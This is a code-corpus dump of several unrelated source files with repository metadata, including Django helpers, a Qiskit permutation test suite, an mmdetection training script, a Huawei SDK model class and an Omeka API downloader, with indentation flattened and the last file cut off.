site = Site.all().filter('domain =', domain).get()
if not site:
# Fall back to with/without 'www.'
if domain.startswith('www.'):
fallback_domain = domain[4:]
else:
fallback_domain = 'www.' + domain
site = Site.all().filter('domain =', fallback_domain).get()
# Add site if it doesn't exist
if not site and getattr(settings, 'CREATE_SITES_AUTOMATICALLY',
True):
site = db_create(Site, domain=domain, name=domain)
site.put()
# Set SITE_ID for this thread/request
if site:
SITE_ID.value = str(site.key())
else:
SITE_ID.value = _default_site_id
cache.set(cache_key, SITE_ID.value, 5*60)
|
[
"cong@snsanalytics.com"
] |
cong@snsanalytics.com
|
e181215cb13fb8115ec569045a2a436e59e5014d
|
53dd5d2cfb79edc87f6c606bbfb7d0bedcf6da61
|
/.history/EMR/SBSteat_20190605143628.py
|
436cd5b69bcdf8df0610fd888bd8a19bbd9dbf67
|
[] |
no_license
|
cyc19950621/python
|
4add54894dc81187211aa8d45e5115903b69a182
|
d184b83e73334a37d413306d3694e14a19580cb0
|
refs/heads/master
| 2020-04-11T20:39:34.641303
| 2019-07-02T12:54:49
| 2019-07-02T12:54:49
| 162,078,640
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 898
|
py
|
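# SBS: set-based similarity of two strings — returns 1 when either
# character set contains the other, otherwise the Jaccard index
# |A & B| / |A | B| of the two character sets.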
def SBS(A,B):
if A==0 or B ==0:
return 0
elif set(A)<=set(B) or set(B)<=set(A):
return 1
else:
return len(set(A)&set(B)) /len(set(A)|set(B))
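# StrToList: split a string into a list of its characters (equivalent to list(A)).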
def StrToList(A):
C=[]
for i in A:
C.append(i)
return C
import re
f = open(r'D:\DeepLearning ER\Z1006014.txt', 'r', errors='ignore')
g = open(r'C:\Users\Administrator\Desktop\ICD-10.txt','r',errors='ignore')
line_re=[]
lines = f.readlines()
dics=g.readlines()
out = []
dics = [re.sub('\n', '', dic) for dic in dics]  # strip trailing newlines from the dictionary entries
for line in lines:
line=re.sub('\n','',line)
line=re.sub(' ','',line)
    line = re.sub(r'\?|?', '', line)  # drop ASCII and full-width question marks
line = re.sub(r'\,|\.|;','',line)
line_re.append(line)
while '' in line_re:
line_re.remove('')
for line in line_re:
    for dic in dics:
        if set(line) >= set(dic):
            out.append(dic)
        elif SBS(line, dic) >= 0.5:  # 0.5 is an assumed similarity cutoff
            out.append(dic)
|
[
"1044801968@qq.com"
] |
1044801968@qq.com
|
0f0419366d770abc9585bc6c697d5ec7c3484d0b
|
000a4b227d970cdc6c8db192f4437698cb782721
|
/python/helpers/typeshed/stubs/pytz/pytz/tzinfo.pyi
|
c2c68526870de2234b2bef2a4957d2805ca999af
|
[
"Apache-2.0",
"MIT"
] |
permissive
|
trinhanhngoc/intellij-community
|
2eb2f66a2a3a9456e7a0c5e7be1eaba03c38815d
|
1d4a962cfda308a73e0a7ef75186aaa4b15d1e17
|
refs/heads/master
| 2022-11-03T21:50:47.859675
| 2022-10-19T16:39:57
| 2022-10-19T23:25:35
| 205,765,945
| 1
| 0
|
Apache-2.0
| 2019-09-02T02:55:15
| 2019-09-02T02:55:15
| null |
UTF-8
|
Python
| false
| false
| 2,045
|
pyi
|
import datetime
from abc import abstractmethod
from typing import Any
class BaseTzInfo(datetime.tzinfo):
zone: str | None # Actually None but should be set on concrete subclasses
# The following abstract methods don't exist in the implementation, but
# are implemented by all sub-classes.
@abstractmethod
def localize(self, dt: datetime.datetime) -> datetime.datetime: ...
@abstractmethod
def normalize(self, dt: datetime.datetime) -> datetime.datetime: ...
@abstractmethod
def tzname(self, dt: datetime.datetime | None) -> str: ...
@abstractmethod
def utcoffset(self, dt: datetime.datetime | None) -> datetime.timedelta | None: ...
@abstractmethod
def dst(self, dt: datetime.datetime | None) -> datetime.timedelta | None: ...
class StaticTzInfo(BaseTzInfo):
def fromutc(self, dt: datetime.datetime) -> datetime.datetime: ...
def localize(self, dt: datetime.datetime, is_dst: bool | None = ...) -> datetime.datetime: ...
def normalize(self, dt: datetime.datetime, is_dst: bool | None = ...) -> datetime.datetime: ...
def tzname(self, dt: datetime.datetime | None, is_dst: bool | None = ...) -> str: ...
def utcoffset(self, dt: datetime.datetime | None, is_dst: bool | None = ...) -> datetime.timedelta: ...
def dst(self, dt: datetime.datetime | None, is_dst: bool | None = ...) -> datetime.timedelta: ...
class DstTzInfo(BaseTzInfo):
def __init__(self, _inf: Any = ..., _tzinfos: Any = ...) -> None: ...
def fromutc(self, dt: datetime.datetime) -> datetime.datetime: ...
def localize(self, dt: datetime.datetime, is_dst: bool | None = ...) -> datetime.datetime: ...
def normalize(self, dt: datetime.datetime) -> datetime.datetime: ...
def tzname(self, dt: datetime.datetime | None, is_dst: bool | None = ...) -> str: ...
def utcoffset(self, dt: datetime.datetime | None, is_dst: bool | None = ...) -> datetime.timedelta | None: ...
def dst(self, dt: datetime.datetime | None, is_dst: bool | None = ...) -> datetime.timedelta | None: ...
|
[
"intellij-monorepo-bot-no-reply@jetbrains.com"
] |
intellij-monorepo-bot-no-reply@jetbrains.com
|
02753e92896aace5a8746356bcdc3beaf50d75d0
|
255e90b6e98753c1b7530279064a9cf5da1a6866
|
/tests/migrations/0003_radiology_lab_name.py
|
7fd80843e89a480259326bde399b61a4a0ecdc38
|
[] |
no_license
|
MindSparkTm/clinicmanagement
|
31b5f66552da3cf51f900e2fd8a75c6e8228c56c
|
5c327126af75d342890645ead7dd835ef45111f7
|
refs/heads/master
| 2020-03-31T22:18:14.201928
| 2018-05-07T10:45:56
| 2018-05-07T10:45:56
| 152,613,900
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 477
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.10 on 2018-04-30 10:50
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('tests', '0002_auto_20180301_2340'),
]
operations = [
migrations.AddField(
model_name='radiology',
name='lab_name',
field=models.TextField(blank=True, max_length=100, null=True),
),
]
|
[
"smartsurajit2008@gmail.com"
] |
smartsurajit2008@gmail.com
|
872419719c7dbbacb98e8fe230dda1d95c9a3bb5
|
effab126713f246b35f43da6e24060fb5dbf7335
|
/dpxdt/server/utils.py
|
965851c3ad359459aff494c7ace9ec690aa87908
|
[
"Apache-2.0"
] |
permissive
|
jujugrrr/dpxdt
|
0a4552a2a87739e972960016881a36b6cd31648d
|
ee579f6027d0349e971a3eab070dad5756c54dcd
|
refs/heads/master
| 2021-01-23T20:38:32.729314
| 2013-07-01T05:38:24
| 2013-07-01T05:38:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,478
|
py
|
#!/usr/bin/env python
# Copyright 2013 Brett Slatkin
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utility functions."""
import base64
import hashlib
import datetime
import logging
import traceback
import uuid
# Local libraries
import flask
from flask import abort, g, jsonify
# Local modules
from . import app
def jsonify_assert(asserted, message, status_code=400):
"""Asserts something is true, aborts the request if not."""
if asserted:
return
try:
raise AssertionError(message)
except AssertionError, e:
stack = traceback.extract_stack()
stack.pop()
logging.error('Assertion failed: %s\n%s',
str(e), ''.join(traceback.format_list(stack)))
abort(jsonify_error(e, status_code=status_code))
def jsonify_error(message_or_exception, status_code=400):
"""Returns a JSON payload that indicates the request had an error."""
if isinstance(message_or_exception, Exception):
message = '%s: %s' % (
message_or_exception.__class__.__name__, message_or_exception)
else:
message = message_or_exception
response = jsonify(error=message)
response.status_code = status_code
return response
# Based on http://flask.pocoo.org/snippets/33/
@app.template_filter()
def timesince(when):
"""Returns string representing "time since" or "time until".
Examples:
3 days ago, 5 hours ago, 3 minutes from now, 5 hours from now, now.
"""
if not when:
return ''
now = datetime.datetime.utcnow()
if now > when:
diff = now - when
suffix = 'ago'
else:
diff = when - now
suffix = 'from now'
periods = (
(diff.days / 365, 'year', 'years'),
(diff.days / 30, 'month', 'months'),
(diff.days / 7, 'week', 'weeks'),
(diff.days, 'day', 'days'),
(diff.seconds / 3600, 'hour', 'hours'),
(diff.seconds / 60, 'minute', 'minutes'),
(diff.seconds, 'second', 'seconds'),
)
for period, singular, plural in periods:
if period:
return '%d %s %s' % (
period,
singular if period == 1 else plural,
suffix)
return 'now'
def human_uuid():
"""Returns a good UUID for using as a human readable string."""
return base64.b32encode(
hashlib.sha1(uuid.uuid4().bytes).digest()).lower().strip('=')
def password_uuid():
"""Returns a good UUID for using as a password."""
return base64.b64encode(
hashlib.sha1(uuid.uuid4().bytes).digest()).strip('=')
# From http://flask.pocoo.org/snippets/53/
def after_this_request(func):
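    # Queue func on flask.g so per_request_callbacks can apply it to the outgoing response.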
if not hasattr(g, 'call_after_request'):
g.call_after_request = []
g.call_after_request.append(func)
return func
@app.after_request
def per_request_callbacks(response):
for func in getattr(g, 'call_after_request', ()):
response = func(response)
return response
|
[
"brett@haxor.com"
] |
brett@haxor.com
|
fe07dd098da9c672cc8538933b82862e8803d26b
|
5cee94279b59f56c39987b94d4a85ca8a4f6966d
|
/app/asset/urls.py
|
0a25a3c193a2987565c8e0ea2c27cd6c82ca1265
|
[
"MIT"
] |
permissive
|
S3Infosoft/s3-dam
|
19c10965dfb17d20c08f0e78b3b096febd646a96
|
67488be012d42cf5826350bff218db2bde70c5e5
|
refs/heads/master
| 2021-05-18T03:53:35.365250
| 2020-05-14T13:34:02
| 2020-05-14T13:34:02
| 251,092,565
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 275
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path("uploadPhoto", views.uploadPhoto, name="uploadPhoto"),
path("uploadDocument/", views.uploadDocument, name="uploadDocument"),
path("viewDocument/", views.viewDocument, name="viewDocument"),
]
|
[
"itssvinayak@gmail.com"
] |
itssvinayak@gmail.com
|
f9b1b694244da3da3ffd59310e2ccfbf529dcd42
|
497e25618ccb09b6f237bb99400d1595d86e15ab
|
/src/12_ItemSetsGenerator.py
|
6d595fbcc263d9b28b8df68fd1bce336abd6f64b
|
[
"CC-BY-4.0"
] |
permissive
|
curation-library-t/dataset2
|
dec966efb8b7ba1f2f94c69a293c6272df8ebcd5
|
681bd425a34d5ca04888e1c1bceefdf69008365d
|
refs/heads/master
| 2021-01-03T10:03:43.702735
| 2020-03-10T04:03:25
| 2020-03-10T04:03:25
| 240,017,931
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,157
|
py
|
import json
import os
import shutil
import urllib.request
import yaml
dir = "../docs/omeka/item_sets"
if os.path.exists(dir):
shutil.rmtree(dir)
os.makedirs(dir, exist_ok=True)
def item_sets_generator():
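    # Page through the Omeka API's /item_sets endpoint and dump each
    # item set as <o:id>.json until an empty page is returned.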
f = open("settings.yml", "r+")
    data = yaml.safe_load(f)  # safe_load avoids constructing arbitrary Python objects
api_url = data["api_url"]
loop_flg = True
page = 1
while loop_flg:
url = api_url + "/item_sets?page=" + str(
page)
print(url)
page += 1
request = urllib.request.Request(url)
response = urllib.request.urlopen(request)
response_body = response.read().decode("utf-8")
data = json.loads(response_body.split('\n')[0])
if len(data) > 0:
for i in range(len(data)):
obj = data[i]
oid = str(obj["o:id"])
with open(dir+"/"+oid+".json", 'w') as outfile:
json.dump(obj, outfile, ensure_ascii=False,
indent=4, sort_keys=True, separators=(',', ': '))
else:
loop_flg = False
if __name__ == "__main__":
item_sets_generator()
|
[
"na.kamura.1263@gmail.com"
] |
na.kamura.1263@gmail.com
|
130b47b6f853783598aaa0f501090f289177b6d9
|
d2c229f74a3ca61d6a22f64de51215d9e30c5c11
|
/test/python/circuit/library/test_permutation.py
|
bf4da582b6ad52f9dbf9fc95e2ab2575ecbaf4ea
|
[
"Apache-2.0"
] |
permissive
|
1ucian0/qiskit-terra
|
90e8be8a7b392fbb4b3aa9784c641a818a180e4c
|
0b51250e219ca303654fc28a318c21366584ccd3
|
refs/heads/main
| 2023-08-31T07:50:33.568824
| 2023-08-22T01:52:53
| 2023-08-22T01:52:53
| 140,555,676
| 6
| 1
|
Apache-2.0
| 2023-09-14T13:21:54
| 2018-07-11T09:52:28
|
Python
|
UTF-8
|
Python
| false
| false
| 7,222
|
py
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test permutation quantum circuits, permutation gates, and quantum circuits that
contain permutation gates."""
import io
import unittest
import numpy as np
from qiskit import QuantumRegister
from qiskit.test.base import QiskitTestCase
from qiskit.circuit import QuantumCircuit
from qiskit.circuit.exceptions import CircuitError
from qiskit.circuit.library import Permutation, PermutationGate
from qiskit.quantum_info import Operator
from qiskit.qpy import dump, load
class TestPermutationLibrary(QiskitTestCase):
"""Test library of permutation logic quantum circuits."""
def test_permutation(self):
"""Test permutation circuit."""
circuit = Permutation(num_qubits=4, pattern=[1, 0, 3, 2])
expected = QuantumCircuit(4)
expected.swap(0, 1)
expected.swap(2, 3)
expected = Operator(expected)
simulated = Operator(circuit)
self.assertTrue(expected.equiv(simulated))
def test_permutation_bad(self):
"""Test that [0,..,n-1] permutation is required (no -1 for last element)."""
self.assertRaises(CircuitError, Permutation, 4, [1, 0, -1, 2])
class TestPermutationGate(QiskitTestCase):
"""Tests for the PermutationGate class."""
def test_permutation(self):
"""Test that Operator can be constructed."""
perm = PermutationGate(pattern=[1, 0, 3, 2])
expected = QuantumCircuit(4)
expected.swap(0, 1)
expected.swap(2, 3)
expected = Operator(expected)
simulated = Operator(perm)
self.assertTrue(expected.equiv(simulated))
def test_permutation_bad(self):
"""Test that [0,..,n-1] permutation is required (no -1 for last element)."""
self.assertRaises(CircuitError, PermutationGate, [1, 0, -1, 2])
def test_permutation_array(self):
"""Test correctness of the ``__array__`` method."""
perm = PermutationGate([1, 2, 0])
# The permutation pattern means q1->q0, q2->q1, q0->q2, or equivalently
# q0'=q1, q1'=q2, q2'=q0, where the primed values are the values after the
# permutation. The following matrix is the expected unitary matrix for this.
# As an example, the second column represents the result of applying
# the permutation to |001>, i.e. to q2=0, q1=0, q0=1. We should get
# q2'=q0=1, q1'=q2=0, q0'=q1=0, that is the state |100>. This corresponds
# to the "1" in the 5 row.
expected_op = np.array(
[
[1, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 1, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 1, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 1, 0],
[0, 1, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 1, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 1, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 1],
]
)
self.assertTrue(np.array_equal(perm.__array__(dtype=int), expected_op))
def test_pattern(self):
"""Test the ``pattern`` method."""
pattern = [1, 3, 5, 0, 4, 2]
perm = PermutationGate(pattern)
self.assertTrue(np.array_equal(perm.pattern, pattern))
def test_inverse(self):
"""Test correctness of the ``inverse`` method."""
perm = PermutationGate([1, 3, 5, 0, 4, 2])
# We have the permutation 1->0, 3->1, 5->2, 0->3, 4->4, 2->5.
# The inverse permutations is 0->1, 1->3, 2->5, 3->0, 4->4, 5->2, or
# after reordering 3->0, 0->1, 5->2, 1->3, 4->4, 2->5.
inverse_perm = perm.inverse()
expected_inverse_perm = PermutationGate([3, 0, 5, 1, 4, 2])
self.assertTrue(np.array_equal(inverse_perm.pattern, expected_inverse_perm.pattern))
class TestPermutationGatesOnCircuit(QiskitTestCase):
"""Tests for quantum circuits containing permutations."""
def test_append_to_circuit(self):
"""Test method for adding Permutations to quantum circuit."""
qc = QuantumCircuit(5)
qc.append(PermutationGate([1, 2, 0]), [0, 1, 2])
qc.append(PermutationGate([2, 3, 0, 1]), [1, 2, 3, 4])
self.assertIsInstance(qc.data[0].operation, PermutationGate)
self.assertIsInstance(qc.data[1].operation, PermutationGate)
def test_inverse(self):
"""Test inverse method for circuits with permutations."""
qc = QuantumCircuit(5)
qc.append(PermutationGate([1, 2, 3, 0]), [0, 4, 2, 1])
qci = qc.inverse()
qci_pattern = qci.data[0].operation.pattern
expected_pattern = [3, 0, 1, 2]
# The inverse permutations should be defined over the same qubits but with the
# inverse permutation pattern.
self.assertTrue(np.array_equal(qci_pattern, expected_pattern))
self.assertTrue(np.array_equal(qc.data[0].qubits, qci.data[0].qubits))
def test_reverse_ops(self):
"""Test reverse_ops method for circuits with permutations."""
qc = QuantumCircuit(5)
qc.append(PermutationGate([1, 2, 3, 0]), [0, 4, 2, 1])
qcr = qc.reverse_ops()
# The reversed circuit should have the permutation gate with the same pattern and over the
# same qubits.
self.assertTrue(np.array_equal(qc.data[0].operation.pattern, qcr.data[0].operation.pattern))
self.assertTrue(np.array_equal(qc.data[0].qubits, qcr.data[0].qubits))
def test_conditional(self):
"""Test adding conditional permutations."""
qc = QuantumCircuit(5, 1)
qc.append(PermutationGate([1, 2, 0]), [2, 3, 4]).c_if(0, 1)
self.assertIsNotNone(qc.data[0].operation.condition)
def test_qasm(self):
"""Test qasm for circuits with permutations."""
qr = QuantumRegister(5, "q0")
circuit = QuantumCircuit(qr)
pattern = [2, 4, 3, 0, 1]
permutation = PermutationGate(pattern)
circuit.append(permutation, [0, 1, 2, 3, 4])
circuit.h(qr[0])
expected_qasm = (
"OPENQASM 2.0;\n"
'include "qelib1.inc";\n'
"gate permutation__2_4_3_0_1_ q0,q1,q2,q3,q4 { swap q2,q3; swap q1,q4; swap q0,q3; }\n"
"qreg q0[5];\n"
"permutation__2_4_3_0_1_ q0[0],q0[1],q0[2],q0[3],q0[4];\n"
"h q0[0];\n"
)
self.assertEqual(expected_qasm, circuit.qasm())
def test_qpy(self):
"""Test qpy for circuits with permutations."""
circuit = QuantumCircuit(6, 1)
circuit.cx(0, 1)
circuit.append(PermutationGate([1, 2, 0]), [2, 4, 5])
circuit.h(4)
print(circuit)
qpy_file = io.BytesIO()
dump(circuit, qpy_file)
qpy_file.seek(0)
new_circuit = load(qpy_file)[0]
self.assertEqual(circuit, new_circuit)
if __name__ == "__main__":
unittest.main()
|
[
"noreply@github.com"
] |
1ucian0.noreply@github.com
|
2a04439769c443bb7d6866e0bfea6b0721b05f7e
|
8f1137592d670ce134821106f736e231b03ead87
|
/tools/train.py
|
21516fd5c10c33bf28186ffedadee978be1c9997
|
[
"MIT"
] |
permissive
|
mousecpn/DMC-Domain-Generalization-for-Underwater-Object-Detection
|
fa426c834fa2a5cd2fe98c50dd4dfeda64fcdc79
|
133797cfb7553557fb81a37e3c99c88154a13765
|
refs/heads/master
| 2023-05-23T16:49:34.795363
| 2023-02-13T02:23:31
| 2023-02-13T02:23:31
| 501,597,077
| 16
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,020
|
py
|
# Copyright (c) OpenMMLab. All rights reserved.
import argparse
import copy
import os
import os.path as osp
import time
import warnings
import mmcv
import torch
from mmcv import Config, DictAction
from mmcv.runner import get_dist_info, init_dist
from mmcv.utils import get_git_hash
from mmdet import __version__
from mmdet.apis import set_random_seed, train_detector
from mmdet.datasets import build_dataset
from mmdet.models import build_detector
from mmdet.utils import collect_env, get_root_logger
def parse_args():
parser = argparse.ArgumentParser(description='Train a detector')
parser.add_argument('config', help='train config file path')
parser.add_argument('--work-dir', help='the dir to save logs and models')
parser.add_argument(
'--resume-from', help='the checkpoint file to resume from')
parser.add_argument(
'--no-validate',
action='store_true',
help='whether not to evaluate the checkpoint during training')
group_gpus = parser.add_mutually_exclusive_group()
group_gpus.add_argument(
'--gpus',
type=int,
help='number of gpus to use '
'(only applicable to non-distributed training)')
group_gpus.add_argument(
'--gpu-ids',
type=int,
nargs='+',
help='ids of gpus to use '
'(only applicable to non-distributed training)')
parser.add_argument('--seed', type=int, default=None, help='random seed')
parser.add_argument(
'--deterministic',
action='store_true',
help='whether to set deterministic options for CUDNN backend.')
parser.add_argument(
'--options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file (deprecate), '
'change to --cfg-options instead.')
parser.add_argument(
'--cfg-options',
nargs='+',
action=DictAction,
help='override some settings in the used config, the key-value pair '
'in xxx=yyy format will be merged into config file. If the value to '
'be overwritten is a list, it should be like key="[a,b]" or key=a,b '
'It also allows nested list/tuple values, e.g. key="[(a,b),(c,d)]" '
'Note that the quotation marks are necessary and that no white space '
'is allowed.')
parser.add_argument(
'--launcher',
choices=['none', 'pytorch', 'slurm', 'mpi'],
default='none',
help='job launcher')
parser.add_argument('--local_rank', type=int, default=0)
args = parser.parse_args()
if 'LOCAL_RANK' not in os.environ:
os.environ['LOCAL_RANK'] = str(args.local_rank)
if args.options and args.cfg_options:
raise ValueError(
'--options and --cfg-options cannot be both '
'specified, --options is deprecated in favor of --cfg-options')
if args.options:
warnings.warn('--options is deprecated in favor of --cfg-options')
args.cfg_options = args.options
return args
def main():
args = parse_args()
cfg = Config.fromfile(args.config)
if args.cfg_options is not None:
cfg.merge_from_dict(args.cfg_options)
# import modules from string list.
if cfg.get('custom_imports', None):
from mmcv.utils import import_modules_from_strings
import_modules_from_strings(**cfg['custom_imports'])
# set cudnn_benchmark
if cfg.get('cudnn_benchmark', False):
torch.backends.cudnn.benchmark = True
# work_dir is determined in this priority: CLI > segment in file > filename
if args.work_dir is not None:
# update configs according to CLI args if args.work_dir is not None
cfg.work_dir = args.work_dir
elif cfg.get('work_dir', None) is None:
# use config filename as default work_dir if cfg.work_dir is None
cfg.work_dir = osp.join('./work_dirs',
osp.splitext(osp.basename(args.config))[0])
if args.resume_from is not None:
cfg.resume_from = args.resume_from
if args.gpu_ids is not None:
cfg.gpu_ids = args.gpu_ids
else:
cfg.gpu_ids = range(1) if args.gpus is None else range(args.gpus)
# init distributed env first, since logger depends on the dist info.
if args.launcher == 'none':
distributed = False
else:
distributed = True
init_dist(args.launcher, **cfg.dist_params)
# re-set gpu_ids with distributed training mode
_, world_size = get_dist_info()
cfg.gpu_ids = range(world_size)
# create work_dir
mmcv.mkdir_or_exist(osp.abspath(cfg.work_dir))
# dump config
cfg.dump(osp.join(cfg.work_dir, osp.basename(args.config)))
# init the logger before other steps
timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())
log_file = osp.join(cfg.work_dir, f'{timestamp}.log')
logger = get_root_logger(log_file=log_file, log_level=cfg.log_level)
# init the meta dict to record some important information such as
# environment info and seed, which will be logged
meta = dict()
# log env info
env_info_dict = collect_env()
env_info = '\n'.join([(f'{k}: {v}') for k, v in env_info_dict.items()])
dash_line = '-' * 60 + '\n'
logger.info('Environment info:\n' + dash_line + env_info + '\n' +
dash_line)
meta['env_info'] = env_info
meta['config'] = cfg.pretty_text
# log some basic info
logger.info(f'Distributed training: {distributed}')
logger.info(f'Config:\n{cfg.pretty_text}')
# set random seeds
if args.seed is not None:
logger.info(f'Set random seed to {args.seed}, '
f'deterministic: {args.deterministic}')
set_random_seed(args.seed, deterministic=args.deterministic)
cfg.seed = args.seed
meta['seed'] = args.seed
meta['exp_name'] = osp.basename(args.config)
model = build_detector(
cfg.model,
train_cfg=cfg.get('train_cfg'),
test_cfg=cfg.get('test_cfg'))
model.init_weights()
datasets = [build_dataset(cfg.data.train)]
if len(cfg.workflow) == 2:
val_dataset = copy.deepcopy(cfg.data.val)
val_dataset.pipeline = cfg.data.train.pipeline
datasets.append(build_dataset(val_dataset))
if cfg.checkpoint_config is not None:
# save mmdet version, config file content and class names in
# checkpoints as meta data
cfg.checkpoint_config.meta = dict(
mmdet_version=__version__ + get_git_hash()[:7],
CLASSES=datasets[0].CLASSES)
# add an attribute for visualization convenience
model.CLASSES = datasets[0].CLASSES
train_detector(
model,
datasets,
cfg,
distributed=distributed,
validate=(not args.no_validate),
timestamp=timestamp,
meta=meta)
if __name__ == '__main__':
import warnings
warnings.filterwarnings("ignore")
main()
|
[
"609731730@qq.com"
] |
609731730@qq.com
|
97113931b94c55421f7eaf0342e8779940eeaccc
|
a2d36e471988e0fae32e9a9d559204ebb065ab7f
|
/huaweicloud-sdk-ccm/huaweicloudsdkccm/v1/model/distinguished_name.py
|
9b1dc6bbb69cd65ec3602053c227ff83175ff3b8
|
[
"Apache-2.0"
] |
permissive
|
zhouxy666/huaweicloud-sdk-python-v3
|
4d878a90b8e003875fc803a61414788e5e4c2c34
|
cc6f10a53205be4cb111d3ecfef8135ea804fa15
|
refs/heads/master
| 2023-09-02T07:41:12.605394
| 2021-11-12T03:20:11
| 2021-11-12T03:20:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,640
|
py
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class DistinguishedName:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'common_name': 'str',
'country': 'str',
'locality': 'str',
'organization': 'str',
'organizational_unit': 'str',
'state': 'str'
}
attribute_map = {
'common_name': 'common_name',
'country': 'country',
'locality': 'locality',
'organization': 'organization',
'organizational_unit': 'organizational_unit',
'state': 'state'
}
def __init__(self, common_name=None, country=None, locality=None, organization=None, organizational_unit=None, state=None):
"""DistinguishedName - a model defined in huaweicloud sdk"""
self._common_name = None
self._country = None
self._locality = None
self._organization = None
self._organizational_unit = None
self._state = None
self.discriminator = None
if common_name is not None:
self.common_name = common_name
if country is not None:
self.country = country
if locality is not None:
self.locality = locality
if organization is not None:
self.organization = organization
if organizational_unit is not None:
self.organizational_unit = organizational_unit
if state is not None:
self.state = state
@property
def common_name(self):
"""Gets the common_name of this DistinguishedName.
        Common name
:return: The common_name of this DistinguishedName.
:rtype: str
"""
return self._common_name
@common_name.setter
def common_name(self, common_name):
"""Sets the common_name of this DistinguishedName.
        Common name
:param common_name: The common_name of this DistinguishedName.
:type: str
"""
self._common_name = common_name
@property
def country(self):
"""Gets the country of this DistinguishedName.
        Country code
:return: The country of this DistinguishedName.
:rtype: str
"""
return self._country
@country.setter
def country(self, country):
"""Sets the country of this DistinguishedName.
        Country code
:param country: The country of this DistinguishedName.
:type: str
"""
self._country = country
@property
def locality(self):
"""Gets the locality of this DistinguishedName.
        Locality name
:return: The locality of this DistinguishedName.
:rtype: str
"""
return self._locality
@locality.setter
def locality(self, locality):
"""Sets the locality of this DistinguishedName.
        Locality name
:param locality: The locality of this DistinguishedName.
:type: str
"""
self._locality = locality
@property
def organization(self):
"""Gets the organization of this DistinguishedName.
        Organization name
:return: The organization of this DistinguishedName.
:rtype: str
"""
return self._organization
@organization.setter
def organization(self, organization):
"""Sets the organization of this DistinguishedName.
        Organization name
:param organization: The organization of this DistinguishedName.
:type: str
"""
self._organization = organization
@property
def organizational_unit(self):
"""Gets the organizational_unit of this DistinguishedName.
        Organizational unit name
:return: The organizational_unit of this DistinguishedName.
:rtype: str
"""
return self._organizational_unit
@organizational_unit.setter
def organizational_unit(self, organizational_unit):
"""Sets the organizational_unit of this DistinguishedName.
        Organizational unit name
:param organizational_unit: The organizational_unit of this DistinguishedName.
:type: str
"""
self._organizational_unit = organizational_unit
@property
def state(self):
"""Gets the state of this DistinguishedName.
        State or province
:return: The state of this DistinguishedName.
:rtype: str
"""
return self._state
@state.setter
def state(self, state):
"""Sets the state of this DistinguishedName.
        State or province
:param state: The state of this DistinguishedName.
:type: str
"""
self._state = state
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DistinguishedName):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
6ec74b00beccb475fbc8db105e3048f59664ccac
|
df541a802b2dfa89d3aab14af627358dc7c76e6e
|
/接口自动化/Frame_relevance/main.py
|
e79ef2e1e37151445218b5da1d27c4a22b306a77
|
[] |
no_license
|
gupan2018/PyAutomation
|
de966aff91f750c7207c9d3f3dfb488698492342
|
230aebe3eca5799c621673afb647d35a175c74f1
|
refs/heads/master
| 2021-09-07T19:44:20.710574
| 2017-12-22T15:58:23
| 2017-12-22T15:58:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 731
|
py
|
__author__ = 'Administrator'
'''
Automate the complete business flow as a chain of API requests: add project -> review -> register -> recharge -> invest.
'''
from Frame_relevance.database import Database
from Frame_relevance.runcase import Runcase
from Frame_relevance.HttpRequest import HttpRequest
path_background = "db_background.conf"
path_test_data = "test_data.conf"
path_http = "http.conf"
path_mode = "mode.conf"
if __name__ == "__main__":
    # get a connection to the back-office database
